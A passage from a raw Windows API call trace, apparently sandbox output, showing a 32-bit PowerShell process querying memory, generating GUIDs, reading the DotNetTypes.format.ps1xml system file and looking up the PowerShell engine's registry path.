lpBuffer=0xcdfa0*(BaseAddress=0xcc000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0078.329] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0xfe0a7169, Data2=0x7d8e, Data3=0x480b, Data4=([0]=0xa3, [1]=0x52, [2]=0xbf, [3]=0x82, [4]=0xa0, [5]=0x3f, [6]=0xfa, [7]=0xf6))) returned 0x0 [0078.331] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x4d6298a5, Data2=0xdeeb, Data3=0x4bea, Data4=([0]=0x81, [1]=0x5a, [2]=0x20, [3]=0x75, [4]=0xf1, [5]=0xb5, [6]=0xfc, [7]=0xca))) returned 0x0 [0078.331] VirtualQuery (in: lpAddress=0xcd018, lpBuffer=0xce018, dwLength=0x1c | out: lpBuffer=0xce018*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0078.332] VirtualQuery (in: lpAddress=0xcd018, lpBuffer=0xce018, dwLength=0x1c | out: lpBuffer=0xce018*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0078.332] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x9617c9f5, Data2=0x4653, Data3=0x4e51, Data4=([0]=0xb4, [1]=0x57, [2]=0xb9, [3]=0xac, [4]=0x8e, [5]=0x40, [6]=0x4, [7]=0xba))) returned 0x0 [0078.339] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x9ef84f52, Data2=0x209e, Data3=0x41c0, Data4=([0]=0x98, [1]=0x6e, [2]=0xb5, [3]=0xed, [4]=0xb4, [5]=0x99, [6]=0xd1, [7]=0x83))) returned 0x0 [0078.339] VirtualQuery (in: lpAddress=0xcd144, lpBuffer=0xce144, dwLength=0x1c | out: lpBuffer=0xce144*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0078.339] VirtualQuery (in: lpAddress=0xccff0, lpBuffer=0xcdff0, dwLength=0x1c | out: lpBuffer=0xcdff0*(BaseAddress=0xcc000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0078.340] VirtualQuery (in: lpAddress=0xccff0, lpBuffer=0xcdff0, dwLength=0x1c | out: lpBuffer=0xcdff0*(BaseAddress=0xcc000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0078.340] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x9aaafb53, Data2=0x4f89, Data3=0x40e9, Data4=([0]=0x93, [1]=0xb, [2]=0x14, [3]=0x94, [4]=0x53, [5]=0xa5, [6]=0x19, [7]=0x3c))) returned 0x0 [0078.340] VirtualQuery (in: lpAddress=0xcd144, lpBuffer=0xce144, dwLength=0x1c | out: lpBuffer=0xce144*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0078.340] VirtualQuery (in: lpAddress=0xcd05c, lpBuffer=0xce05c, dwLength=0x1c | out: lpBuffer=0xce05c*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0078.344] VirtualQuery (in: lpAddress=0xccd10, lpBuffer=0xcdd10, dwLength=0x1c | out: lpBuffer=0xcdd10*(BaseAddress=0xcc000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0078.345] VirtualQuery (in: lpAddress=0xccd10, lpBuffer=0xcdd10, dwLength=0x1c | out: lpBuffer=0xcdd10*(BaseAddress=0xcc000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0078.345] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x468a95f4, Data2=0x5ec0, Data3=0x4259, Data4=([0]=0xa9, [1]=0x6, [2]=0xc3, [3]=0xe9, [4]=0xda, [5]=0x56, [6]=0x70, [7]=0x4a))) returned 0x0 [0078.346] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x7db86482, Data2=0xbab2, Data3=0x40d9, Data4=([0]=0xba, [1]=0x6, [2]=0xd2, [3]=0x96, [4]=0x5b, [5]=0x43, [6]=0xd4, [7]=0xf9))) returned 0x0 [0078.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcdd5c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0078.346] GetLastError () returned 0x57 [0078.346] SetErrorMode (uMode=0x1) returned 0x1 [0078.347] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x310 [0078.347] GetLastError () returned 0x0 [0078.347] GetFileType (hFile=0x310) returned 0x1 [0078.347] SetErrorMode (uMode=0x1) returned 0x1 [0078.347] GetFileType (hFile=0x310) returned 0x1 [0078.347] ReadFile (in: hFile=0x310, lpBuffer=0x2f490e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f490e4*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.372] GetLastError () returned 0x0 [0078.374] ReadFile (in: hFile=0x310, lpBuffer=0x2f490e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f490e4*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.384] GetLastError () returned 0x0 [0078.385] ReadFile (in: hFile=0x310, lpBuffer=0x2f490e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f490e4*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.385] GetLastError () returned 0x0 [0078.385] ReadFile (in: hFile=0x310, lpBuffer=0x2f490e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f490e4*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.385] GetLastError () returned 0x0 [0078.386] ReadFile (in: hFile=0x310, lpBuffer=0x2f490e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f490e4*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.387] GetLastError () returned 0x0 [0078.387] ReadFile (in: hFile=0x310, lpBuffer=0x2f490e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f490e4*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.387] GetLastError () returned 0x0 [0078.387] ReadFile (in: hFile=0x310, lpBuffer=0x2f490e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f490e4*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.387] GetLastError () returned 0x0 [0078.387] ReadFile (in: hFile=0x310, lpBuffer=0x2f490e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f490e4*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.387] GetLastError () returned 0x0 [0078.389] ReadFile (in: hFile=0x310, lpBuffer=0x2f490e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f490e4*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.389] GetLastError () returned 0x0 [0078.389] ReadFile (in: hFile=0x310, lpBuffer=0x2f490e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f490e4*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.389] GetLastError () returned 0x0 [0078.389] ReadFile (in: hFile=0x310, lpBuffer=0x2f490e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f490e4*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.389] GetLastError () returned 0x0 [0078.390] ReadFile (in: hFile=0x310, lpBuffer=0x2f490e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f490e4*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.390] GetLastError () returned 0x0 [0078.390] ReadFile (in: hFile=0x310, lpBuffer=0x2f490e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f490e4*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.390] GetLastError () returned 0x0 [0078.390] ReadFile (in: hFile=0x310, lpBuffer=0x2f490e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f490e4*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.390] GetLastError () returned 0x0 [0078.390] ReadFile (in: hFile=0x310, lpBuffer=0x2f490e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f490e4*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.391] GetLastError () returned 0x0 [0078.391] ReadFile (in: hFile=0x310, lpBuffer=0x2f490e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f490e4*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.391] GetLastError () returned 0x0 [0078.394] ReadFile (in: hFile=0x310, lpBuffer=0x2f490e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f490e4*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.395] GetLastError () returned 0x0 [0078.395] ReadFile (in: hFile=0x310, lpBuffer=0x2f490e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f490e4*, lpNumberOfBytesRead=0xce2c4*=0xbce, lpOverlapped=0x0) returned 1 [0078.395] GetLastError () returned 0x0 [0078.395] ReadFile (in: hFile=0x310, lpBuffer=0x2f48852, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f48852*, lpNumberOfBytesRead=0xce2c4*=0x0, lpOverlapped=0x0) returned 1 [0078.395] GetLastError () returned 0x0 [0078.395] ReadFile (in: hFile=0x310, lpBuffer=0x2f490e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f490e4*, lpNumberOfBytesRead=0xce2c4*=0x0, lpOverlapped=0x0) returned 1 [0078.395] GetLastError () returned 0x0 [0078.396] CloseHandle (hObject=0x310) returned 1 [0078.396] GetLastError () returned 0x0 [0078.396] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcde24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0078.396] GetLastError () returned 0x0 [0078.396] SetErrorMode (uMode=0x1) returned 0x1 [0078.396] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", fInfoLevelId=0x0, lpFileInformation=0x2f6a0e0 | out: lpFileInformation=0x2f6a0e0) returned 1 [0078.396] GetLastError () returned 0x0 [0078.396] SetErrorMode (uMode=0x1) returned 0x1 [0078.397] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcddf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0078.397] GetLastError () returned 0x0 [0078.397] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xce248 | out: phkResult=0xce248*=0x310) returned 0x0 [0078.397] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xce290, lpData=0x0, lpcbData=0xce28c*=0x0 | out: lpType=0xce290*=0x1, lpData=0x0, lpcbData=0xce28c*=0x56) returned 0x0 [0078.397] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xce290, lpData=0x2d1690, lpcbData=0xce28c*=0x56 | out: lpType=0xce290*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xce28c*=0x56) returned 0x0 [0078.398] RegCloseKey (hKey=0x310) returned 0x0 [0078.398] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcddf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0078.398] GetLastError () returned 0x0 [0078.398] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcdd84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0078.398] GetLastError () returned 0x0 [0078.406] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0xd262347d, Data2=0x4cd6, Data3=0x4dca, Data4=([0]=0xb0, [1]=0xd6, [2]=0x98, [3]=0x24, [4]=0x59, [5]=0xc7, [6]=0x66, [7]=0x51))) returned 0x0 [0078.406] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x22bcbe9b, Data2=0x4a95, Data3=0x4e6a, Data4=([0]=0x8a, [1]=0x34, [2]=0xb4, [3]=0x5c, [4]=0x85, [5]=0x1d, [6]=0x46, [7]=0xc5))) returned 0x0 [0078.407] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x13f59c31, Data2=0x4cf6, Data3=0x46d9, Data4=([0]=0x9f, [1]=0xfc, [2]=0xfa, [3]=0xf4, [4]=0xbb, [5]=0x50, [6]=0x5d, [7]=0x29))) returned 0x0 [0078.407] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x1f3ed68a, Data2=0xc12f, Data3=0x4db5, Data4=([0]=0xbc, [1]=0x5b, [2]=0xad, [3]=0x49, [4]=0x40, [5]=0x13, [6]=0x15, [7]=0xa6))) returned 0x0 [0078.407] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0xea3e6db2, Data2=0x60ec, Data3=0x4100, Data4=([0]=0x82, [1]=0x9a, [2]=0xe4, [3]=0x34, [4]=0xbb, [5]=0x26, [6]=0xe8, [7]=0x44))) returned 0x0 [0078.408] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0xd575f1a1, Data2=0xd215, Data3=0x4a70, Data4=([0]=0x93, [1]=0x92, [2]=0x23, [3]=0x91, [4]=0xd5, [5]=0x9b, [6]=0xa0, [7]=0xdb))) returned 0x0 [0078.408] VirtualQuery (in: lpAddress=0xccff0, lpBuffer=0xcdff0, dwLength=0x1c | out: lpBuffer=0xcdff0*(BaseAddress=0xcc000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0078.408] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x80f6e401, Data2=0x2b1c, Data3=0x4b96, Data4=([0]=0x80, [1]=0xb, [2]=0xb5, [3]=0xa3, [4]=0x84, [5]=0x10, [6]=0x1, [7]=0x3))) returned 0x0 [0078.409] VirtualQuery (in: lpAddress=0xccff0, lpBuffer=0xcdff0, dwLength=0x1c | out: lpBuffer=0xcdff0*(BaseAddress=0xcc000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0078.409] VirtualQuery (in: lpAddress=0xccff0, lpBuffer=0xcdff0, dwLength=0x1c | out: lpBuffer=0xcdff0*(BaseAddress=0xcc000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0078.410] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0xc990104, Data2=0x5f5e, Data3=0x4408, Data4=([0]=0xa6, [1]=0xa, [2]=0xf9, [3]=0xb2, [4]=0xa3, [5]=0x9d, [6]=0x20, [7]=0x3c))) returned 0x0 [0078.410] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0xe6e57be1, Data2=0xbb49, Data3=0x41c7, Data4=([0]=0x8f, [1]=0x3a, [2]=0xf6, [3]=0x3e, [4]=0xea, [5]=0x9a, [6]=0xe3, [7]=0xb5))) returned 0x0 [0078.411] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x11ccb391, Data2=0xcdac, Data3=0x4a10, Data4=([0]=0xab, [1]=0x2c, [2]=0x2e, [3]=0x5, [4]=0x22, [5]=0x59, [6]=0x71, [7]=0xd5))) returned 0x0 [0078.411] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0xf6609b5c, Data2=0xa372, Data3=0x4d03, Data4=([0]=0xb3, [1]=0x1, [2]=0x6d, [3]=0xf0, [4]=0x67, [5]=0xb, [6]=0xf7, [7]=0x4))) returned 0x0 [0078.412] VirtualQuery (in: lpAddress=0xccff0, lpBuffer=0xcdff0, dwLength=0x1c | out: lpBuffer=0xcdff0*(BaseAddress=0xcc000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0078.412] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x1309def5, Data2=0x5b2c, Data3=0x4278, Data4=([0]=0xb6, [1]=0x5a, [2]=0x48, [3]=0x6d, [4]=0xa2, [5]=0x12, [6]=0x56, [7]=0xd2))) returned 0x0 [0078.412] VirtualQuery (in: lpAddress=0xccff0, lpBuffer=0xcdff0, dwLength=0x1c | out: lpBuffer=0xcdff0*(BaseAddress=0xcc000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0078.413] VirtualQuery (in: lpAddress=0xccff0, lpBuffer=0xcdff0, dwLength=0x1c | out: lpBuffer=0xcdff0*(BaseAddress=0xcc000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0078.414] VirtualQuery (in: lpAddress=0xccff0, lpBuffer=0xcdff0, dwLength=0x1c | out: lpBuffer=0xcdff0*(BaseAddress=0xcc000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0078.415] VirtualQuery (in: lpAddress=0xccff0, lpBuffer=0xcdff0, dwLength=0x1c | out: lpBuffer=0xcdff0*(BaseAddress=0xcc000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0078.416] VirtualQuery (in: lpAddress=0xccff0, lpBuffer=0xcdff0, dwLength=0x1c | out: lpBuffer=0xcdff0*(BaseAddress=0xcc000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0078.417] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0xad67f8f9, Data2=0x7009, Data3=0x4233, Data4=([0]=0x9f, [1]=0xbd, [2]=0xe, [3]=0xaf, [4]=0x1b, [5]=0x6f, [6]=0x55, [7]=0xdc))) returned 0x0 [0078.417] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x2c90ac36, Data2=0x3cb8, Data3=0x4dbe, Data4=([0]=0xb1, [1]=0x9c, [2]=0x76, [3]=0x4d, [4]=0xc4, [5]=0xe9, [6]=0x3f, [7]=0xef))) returned 0x0 [0078.418] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x7b72d2a9, Data2=0x905d, Data3=0x4f73, Data4=([0]=0x85, [1]=0x27, [2]=0x1e, [3]=0x24, [4]=0x52, [5]=0xc2, [6]=0xd9, [7]=0x9f))) returned 0x0 [0078.418] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x78bcc30a, Data2=0x743a, Data3=0x4fac, Data4=([0]=0xaa, [1]=0xbc, [2]=0x65, [3]=0xce, [4]=0xe2, [5]=0xfe, [6]=0xf9, [7]=0xa5))) returned 0x0 [0078.418] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x83576a57, Data2=0x7075, Data3=0x4b3f, Data4=([0]=0x85, [1]=0xbb, [2]=0xb, [3]=0x8b, [4]=0x51, [5]=0xc0, [6]=0xf, [7]=0x67))) returned 0x0 [0078.419] VirtualQuery (in: lpAddress=0xcd144, lpBuffer=0xce144, dwLength=0x1c | out: lpBuffer=0xce144*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0078.419] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x31673de0, Data2=0xbcdb, Data3=0x4005, Data4=([0]=0xb8, [1]=0xcc, [2]=0xbf, [3]=0x7a, [4]=0xb5, [5]=0xdc, [6]=0xcc, [7]=0xc2))) returned 0x0 [0078.421] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0xfa657c7c, Data2=0xdfd5, Data3=0x4fe2, Data4=([0]=0x81, [1]=0xb1, [2]=0x39, [3]=0xc2, [4]=0x1d, [5]=0x36, [6]=0x56, [7]=0x6a))) returned 0x0 [0078.422] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x20b83c30, Data2=0x8b76, Data3=0x4bc0, Data4=([0]=0x87, [1]=0xa5, [2]=0x40, [3]=0xa9, [4]=0xc2, [5]=0x8b, [6]=0x52, [7]=0x74))) returned 0x0 [0078.423] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0xa51c8be0, Data2=0xc6e5, Data3=0x4121, Data4=([0]=0xa3, [1]=0x1b, [2]=0x7e, [3]=0x46, [4]=0xde, [5]=0xe7, [6]=0x8e, [7]=0xd))) returned 0x0 [0078.423] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x353f522c, Data2=0xc10, Data3=0x410d, Data4=([0]=0x8e, [1]=0x8e, [2]=0x6a, [3]=0xd4, [4]=0x44, [5]=0x25, [6]=0x38, [7]=0xa7))) returned 0x0 [0078.423] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0xdb67f51a, Data2=0x5a70, Data3=0x408b, Data4=([0]=0x81, [1]=0xdb, [2]=0xc7, [3]=0xb5, [4]=0x88, [5]=0xb2, [6]=0xeb, [7]=0x9f))) returned 0x0 [0078.424] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x1a84a0a8, Data2=0xb500, Data3=0x4ff7, Data4=([0]=0x86, [1]=0xbd, [2]=0xae, [3]=0x36, [4]=0x32, [5]=0xe6, [6]=0x55, [7]=0x49))) returned 0x0 [0078.424] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x2ad561d8, Data2=0xb3f5, Data3=0x4078, Data4=([0]=0xa7, [1]=0xc6, [2]=0xdf, [3]=0xee, [4]=0xfc, [5]=0x10, [6]=0x43, [7]=0x94))) returned 0x0 [0078.424] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0xf619067d, Data2=0x1e5d, Data3=0x4efc, Data4=([0]=0xbe, [1]=0xd6, [2]=0xc7, [3]=0x6f, [4]=0x2a, [5]=0x0, [6]=0xc0, [7]=0x2a))) returned 0x0 [0078.425] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x7ba2a904, Data2=0xf0fe, Data3=0x49ed, Data4=([0]=0xb2, [1]=0x2e, [2]=0x49, [3]=0xb3, [4]=0xff, [5]=0x16, [6]=0x3a, [7]=0xe0))) returned 0x0 [0078.425] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x257c57e, Data2=0x4679, Data3=0x42b9, Data4=([0]=0xa3, [1]=0x4a, [2]=0xa4, [3]=0xb0, [4]=0x6f, [5]=0x25, [6]=0xf1, [7]=0x6f))) returned 0x0 [0078.425] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x152a072d, Data2=0x7261, Data3=0x4fef, Data4=([0]=0x99, [1]=0x8f, [2]=0x6e, [3]=0x16, [4]=0xcf, [5]=0x28, [6]=0x67, [7]=0xf7))) returned 0x0 [0078.426] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x68f2390f, Data2=0x98ce, Data3=0x4257, Data4=([0]=0x86, [1]=0xb6, [2]=0xaa, [3]=0x3c, [4]=0xe6, [5]=0x96, [6]=0x7b, [7]=0x7b))) returned 0x0 [0078.426] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0xb90c6a44, Data2=0x536e, Data3=0x4e06, Data4=([0]=0xbf, [1]=0x63, [2]=0x4d, [3]=0x5, [4]=0xd8, [5]=0xd0, [6]=0xe7, [7]=0x28))) returned 0x0 [0078.427] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0xc1fb54e6, Data2=0x47fd, Data3=0x497f, Data4=([0]=0xbe, [1]=0x34, [2]=0x97, [3]=0xaf, [4]=0x54, [5]=0x60, [6]=0x8e, [7]=0xc1))) returned 0x0 [0078.427] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x7fd77a83, Data2=0x64ce, Data3=0x451b, Data4=([0]=0x84, [1]=0xab, [2]=0x21, [3]=0x72, [4]=0xdd, [5]=0xb8, [6]=0x2b, [7]=0x5f))) returned 0x0 [0078.427] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x9463e81e, Data2=0x3a3d, Data3=0x4861, Data4=([0]=0xbb, [1]=0x80, [2]=0x3b, [3]=0x6e, [4]=0x20, [5]=0x7e, [6]=0x85, [7]=0xf6))) returned 0x0 [0078.428] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x64245714, Data2=0x8c19, Data3=0x4623, Data4=([0]=0xa3, [1]=0x97, [2]=0x3b, [3]=0x98, [4]=0x99, [5]=0x87, [6]=0xe, [7]=0x90))) returned 0x0 [0078.428] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x61412ae, Data2=0x7f06, Data3=0x400a, Data4=([0]=0x9b, [1]=0xb, [2]=0x6a, [3]=0x24, [4]=0x49, [5]=0xd6, 